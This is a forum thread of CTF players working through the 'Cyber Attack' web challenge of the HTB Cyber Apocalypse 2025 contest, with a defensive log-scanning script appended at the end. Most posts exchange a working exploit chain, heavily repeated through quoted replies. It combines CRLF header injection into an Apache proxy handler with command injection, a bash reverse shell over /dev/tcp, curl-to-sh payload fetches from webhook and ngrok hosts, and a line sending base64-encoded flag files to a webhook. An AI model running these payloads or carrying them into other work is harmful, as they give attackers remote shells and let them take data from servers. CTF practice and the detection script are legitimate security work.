cyber apocalypse HTB ctf 2025
by RedBlock - Friday March 21, 2025 at 11:38 AM
#21
(Mar 23, 2025, 03:09 PM)oyfyic Wrote:
(Mar 23, 2025, 02:24 PM)0xhdfg Wrote:
(Mar 23, 2025, 12:47 PM)0x02b375 Wrote:
(Mar 23, 2025, 11:47 AM)oyfyic Wrote:
(Mar 23, 2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener

(Mar 23, 2025, 12:43 PM)oyfyic Wrote:
(Mar 23, 2025, 12:16 PM)x1rx Wrote:
curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`


So the final payload will look like: 


curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'


And as the content of the webhook you can put:

Content-Type text/html
Content:
#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else
Reply
#22
(Mar 23, 2025, 03:17 PM)randomregister Wrote:
(Mar 23, 2025, 03:09 PM)oyfyic Wrote:
(Mar 23, 2025, 02:24 PM)0xhdfg Wrote:
(Mar 23, 2025, 12:47 PM)0x02b375 Wrote:
(Mar 23, 2025, 11:47 AM)oyfyic Wrote: //SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener

(Mar 23, 2025, 12:43 PM)oyfyic Wrote: Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`


So the final payload will look like: 


curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'


And as the content of the webhook you can put:

Content-Type text/html
Content:
#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else

What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this
Reply
#23
Can someone explain the payload ?? 
And why is "-" working on target ? Because the regex should block the dash ...
Reply
#24
(Mar 23, 2025, 03:09 PM)oyfyic Wrote:
(Mar 23, 2025, 02:24 PM)0xhdfg Wrote:
(Mar 23, 2025, 12:47 PM)0x02b375 Wrote:
(Mar 23, 2025, 11:47 AM)oyfyic Wrote:
(Mar 23, 2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener

(Mar 23, 2025, 12:43 PM)oyfyic Wrote:
(Mar 23, 2025, 12:16 PM)x1rx Wrote:
curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`


So the final payload will look like: 


curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'


And as the content of the webhook you can put:

Content-Type text/html
Content:
#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?
Reply
#25
(Mar 23, 2025, 07:14 PM)0xhdfg Wrote:
(Mar 23, 2025, 03:09 PM)oyfyic Wrote:
(Mar 23, 2025, 02:24 PM)0xhdfg Wrote:
(Mar 23, 2025, 12:47 PM)0x02b375 Wrote:
(Mar 23, 2025, 11:47 AM)oyfyic Wrote: //SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener

(Mar 23, 2025, 12:43 PM)oyfyic Wrote: Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`


So the final payload will look like: 


curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'


And as the content of the webhook you can put:

Content-Type text/html
Content:
#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?

Same thing here. I tried everything posted in this thread too.
Reply
#26
(Mar 23, 2025, 03:25 PM)oyfyic Wrote:
(Mar 23, 2025, 03:17 PM)randomregister Wrote:
(Mar 23, 2025, 03:09 PM)oyfyic Wrote:
(Mar 23, 2025, 02:24 PM)0xhdfg Wrote:
(Mar 23, 2025, 12:47 PM)0x02b375 Wrote: what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`


So the final payload will look like: 


curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'


And as the content of the webhook you can put:

Content-Type text/html
Content:
#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else

What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this

try it on your localhost, it will most likely work
Reply
#27
I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Reply
#28
(Mar 24, 2025, 01:13 AM)htdgthdsfx Wrote: I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.

Yeah. Can't seem to get past the filters. Someone who has solved this challenge kindly tell us what you did because it just ain't working out for us
Reply
#29
(Mar 24, 2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist
Reply
#30
(Mar 24, 2025, 01:12 PM)oyfyic Wrote:
(Mar 24, 2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist

While working on this challenge, I had some issues with the '/'. Even tho I encoded it 2 times, it was kinda still not working. So instead I used a solve like this :
curl+xx.xx.xx.xx?a=$(ls) just avoid doing any kind of '/', here's the solve :
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
also remember to double encode this.
Reply
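
Added example (not part of the thread and not the challenge's own code): the requests quoted above carry percent-encoded CR/LF in the `name` parameter, followed by `Location:` and `Content-Type: proxy:` header text and a `$(...)` substitution, and post #30 mentions double encoding. The sketch below checks access-log lines for those markers, decoding more than once; the log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); not taken from the thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Mar/2025:12:00:01 +0000] "GET /cgi-bin/attack-domain?target=example.com&name=John+Doe%20Jr HTTP/1.1" 302 310',
    '203.0.113.9 - - [23/Mar/2025:12:16:07 +0000] "GET /cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(id)%26name=%0d%0a%0d%0a HTTP/1.1" 302 377',
    '203.0.113.9 - - [23/Mar/2025:12:18:44 +0000] "GET /cgi-bin/attack-domain?target=-&name=a%250d%250aLocation:%2520/a HTTP/1.1" 302 377',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Hypothetical rule names; each pattern is matched against every decoding layer.
RULES = {
    "crlf": re.compile(r"[\r\n]"),
    "injected-header": re.compile(r"[\r\n]\s*(location|content-type)\s*:", re.I),
    "proxy-handler": re.compile(r"content-type\s*:\s*proxy:", re.I),
    "shell-substitution": re.compile(r"\$\(|`"),
}

def decode_layers(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    layers = [value]
    for _ in range(rounds):
        nxt = unquote_plus(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def classify(line):
    """Return the set of rule names that match the query string of one log line."""
    m = REQUEST.search(line)
    if not m or "?" not in m.group(1):
        return set()
    query = m.group(1).split("?", 1)[1]
    return {tag for layer in decode_layers(query)
            for tag, rx in RULES.items() if rx.search(layer)}

def scan(lines):
    """Return (line index, sorted rule names) for every line with at least one hit."""
    return [(i, sorted(tags)) for i, line in enumerate(lines) if (tags := classify(line))]

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOG):
        print(idx, ", ".join(tags))
```

The durable fix is on the server side: reject CR and LF in any value a CGI script writes into a response header, and never pass request parameters to a shell.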

